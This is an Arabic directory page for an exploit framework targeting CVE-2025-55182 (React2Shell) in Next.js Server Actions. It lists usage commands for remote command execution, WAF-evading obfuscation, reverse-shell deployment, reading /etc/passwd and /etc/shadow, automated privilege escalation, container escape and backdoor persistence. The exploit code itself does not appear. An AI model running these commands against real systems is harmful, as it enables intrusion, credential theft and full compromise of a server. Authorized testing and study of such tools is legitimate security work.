Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Cerberus-React2Shell-Scanner-Exploit — مجموعة أدوات استغلال متطورة لـ CVE-2025-55182 (ثغرة تنفيذ الأوامر في مكونات خادم React). حمولات متعددة الأشكال غير متزامنة، تجاوز متقدم لجدار الحماية وشبكة توصيل المحتوى (WAF/CDN)، تدوير الوكيل، مسح جماعي عبر Shodan/Censys، اختراق تلقائي مع قذائف عكسية، قوالب Nuclei، مختبر K8s ولوحة تحكم C2. من تأليف Sudeepa Wanigarathna – مخصصة فقط لاختبار الاختراق والاختبارات الأمنية المصرح بها. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
أطر اختبار الاختراقتصعيد الامتيازاتماسحات الثغرات الأمنيةأطر الاستغلالشيل كوداستغلال تطبيقات الويبما بعد الاستغلالالقيادة والسيطرةالتعلم والتعليم
الفريق الأحمر
تطوير الحمولات
مختبرات وتدريب عملي
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

عرض المستودع
218منذ 18 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

مجموعة أدوات استغلال متطورة لـ CVE-2025-55182 (ثغرة تنفيذ الأوامر في مكونات خادم React). حمولات متعددة الأشكال غير متزامنة، تجاوز متقدم لجدار الحماية وشبكة توصيل المحتوى (WAF/CDN)، تدوير الوكيل، مسح جماعي عبر Shodan/Censys، اختراق تلقائي مع قذائف عكسية، قوالب Nuclei، مختبر K8s ولوحة تحكم C2. من تأليف Sudeepa Wanigarathna – مخصصة فقط لاختبار الاختراق والاختبارات الأمنية المصرح بها.

مشاركة

Cerberus React2Shell - إطار عمل استغلال متقدم

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 نظرة عامة

إطار عمل استغلال احترافي لثغرة تنفيذ الأكواد عن بُعد في Next.js Server Actions (React2Shell). يوضح سلسلة الهجوم الكاملة من الوصول الأولي إلى تصعيد الصلاحيات إلى صلاحيات الجذر.

الإمكانيات:

  • ✅ اكتشاف تلقائي للثغرات
  • ✅ تنفيذ الأكواد عن بُعد (RCE)
  • ✅ وصول تفاعلي للصدفة
  • ✅ تعداد نظام Linux
  • ✅ تصعيد صلاحيات تلقائي
  • ✅ نشر صدفة عكسية
  • ✅ رفع/تنزيل الملفات
  • ✅ عرض الوصول إلى صلاحيات الجذر

🚀 بدء سريع

تنفيذ الأكواد الأساسي (RCE)

root@kitploit:~
# فحص الثغرة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# تنفيذ أمر
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

الصدفة التفاعلية

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

سلسلة الهجوم الآلي الكاملة

root@kitploit:~
# استغلال كامل: RCE ← التعداد ← الوصول إلى الجذر
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 هيكل الإطار

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # محرك الاستغلال الأساسي (400+ سطر)
├── demo_exploit.py              # سلسلة الهجوم الآلي (290+ سطر)
├── interactive_shell.py         # الصدفة التفاعلية (280+ سطر)
├── reverse_shell_handler.py     # مستمع الصدفة العكسية (180+ سطر)
├── post_exploit/
│   ├── linux_enum.py           # تعداد النظام (330+ سطر)
│   ├── priv_esc.py             # تصعيد الصلاحيات (320+ سطر)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # توثيق الاستخدام الكامل
├── QUICKSTART.md                # مرجع سريع
└── BANNER.txt

🔥 الميزات

محرك الاستغلال الأساسي

  • اكتشاف Action ID: استخراج تلقائي من حزم JavaScript
  • حمولات متعددة: execSync، spawn، eval، متغيرات mainModule
  • استخراج المخرجات: تحليل مخرجات الأوامر من استجابات الأخطاء
  • تجاوز WAF: تقنيات إخفاء الحمولات

ما بعد الاستغلال

  • تعداد Linux: ثنائيات SUID/SGID، المسارات القابلة للكتابة، مهام cron، إصدار النواة
  • تصعيد الصلاحيات: GTFOBins، ملفات /etc القابلة للكتابة، الهروب من Docker، الصلاحيات
  • عمليات الملفات: رفع/تنزيل مع ترميز base64
  • الاستمرارية: طرق متعددة للباب الخلفي

الأدوات التفاعلية

  • الصدفة التفاعلية: تنفيذ أوامر في الوقت الفعلي مع أوامر مدمجة
  • الصدفة العكسية: أنواع متعددة من الصدف (bash، python، nc، perl)
  • وضع العرض: عرض آلي من 6 خطوات

📖 أمثلة الاستخدام

1. الأوامر الأساسية

root@kitploit:~
# فحص الثغرة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# تنفيذ الأوامر
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# متغيرات حمولة مختلفة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# مع الإخفاء
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. الصدفة التفاعلية

root@kitploit:~
# تشغيل الصدفة
python3 interactive_shell.py --target http://127.0.0.1:3000

# الأوامر المتاحة:
# - execute <cmd>        : تنفيذ أمر صدفة
# - enum                 : تشغيل تعداد كامل
# - escalate             : محاولة تصعيد الصلاحيات
# - upload <local> <remote>  : رفع ملف
# - download <remote> <local>: تنزيل ملف
# - shell <lhost> <lport>: نشر صدفة عكسية
# - info                 : عرض معلومات الجلسة
# - exit                 : خروج

3. الصدفة العكسية

root@kitploit:~
# الطرفية 1: تشغيل المستمع
python3 reverse_shell_handler.py --lport 4444

# الطرفية 2: نشر الصدفة
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. العرض الآلي

root@kitploit:~
# السلسلة الكاملة: الاكتشاف ← RCE ← التعداد ← الجذر
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 سلسلة الهجوم

ينفذ الإطار سلسلة استغلال كاملة من 6 خطوات:

  1. الاكتشاف - استخراج Server Action IDs من حزم JavaScript
  2. الاستغلال - العثور على Action ID عامل وتحقيق RCE
  3. التحقق - تأكيد تنفيذ الأكواد بأمر id
  4. التعداد - جمع معلومات النظام، ثنائيات SUID، المسارات القابلة للكتابة
  5. التصعيد - استغلال متجهات تصعيد الصلاحيات تلقائيًا
  6. العرض - إثبات الوصول إلى الجذر بقراءة /etc/shadow وسرد /root

🛡️ تقنيات تصعيد الصلاحيات

الطرق المنفذة

  1. ثنائيات SUID (GTFOBins)

    • find، vim، python، perl، bash، awk، sed، less، more، nmap
  2. ملفات /etc القابلة للكتابة

    • /etc/passwd - إضافة مستخدم جذر جديد
    • /etc/shadow - مسح كلمة مرور الجذر
    • /etc/sudoers - منح صلاحية sudo بدون كلمة مرور (NOPASSWD)
  3. الهروب من Docker

    • استغلال مقبس Docker المتاح
    • كسر الحاوية المميزة
  4. استغلالات النواة

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. صلاحيات Linux

    • استغلال CAP_SETUID، CAP_DAC_OVERRIDE

📊 الإحصائيات

  • إجمالي أسطر الأكواد: 1,800+
  • الوحدات: 8
  • تقنيات تصعيد الصلاحيات: 5
  • متغيرات الحمولة: 4
  • أنواع الصدف: 4 (bash، python، nc، perl)

⚙️ المتطلبات

root@kitploit:~
pip install -r requirements.txt

التبعيات:

  • requests
  • colorama

📚 التوثيق

  • EXPLOITATION_GUIDE.md - دليل الاستخدام الكامل مع الأمثلة
  • QUICKSTART.md - مرجع سريع للأوامر الشائعة

⚠️ إخلاء المسؤولية

تحذير: هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة. استخدمها على مسؤوليتك الخاصة.

🎓 الغرض التعليمي

صُمم هذا الإطار من أجل:

  • باحثي الأمان الذين يدرسون ثغرات Next.js
  • مختبرو الاختراق المصرح لهم
  • التدريب الأمني وتحديات CTF
  • أبحاث الثغرات في بيئات المختبرات الخاضعة للتحكم

📄 الترخيص

MIT License (لأغراض تعليمية فقط)

👤 المؤلف

Sudeepa Wanigarathna

  • خبير في تطوير الاستغلالات
  • باحث أمني
  • مختبر اختراق

الإصدار: 1.0
آخر تحديث: ديسمبر 2025

للحصول على تعليمات الاستخدام التفصيلية، راجع EXPLOITATION_GUIDE.md

تنزيل الأداة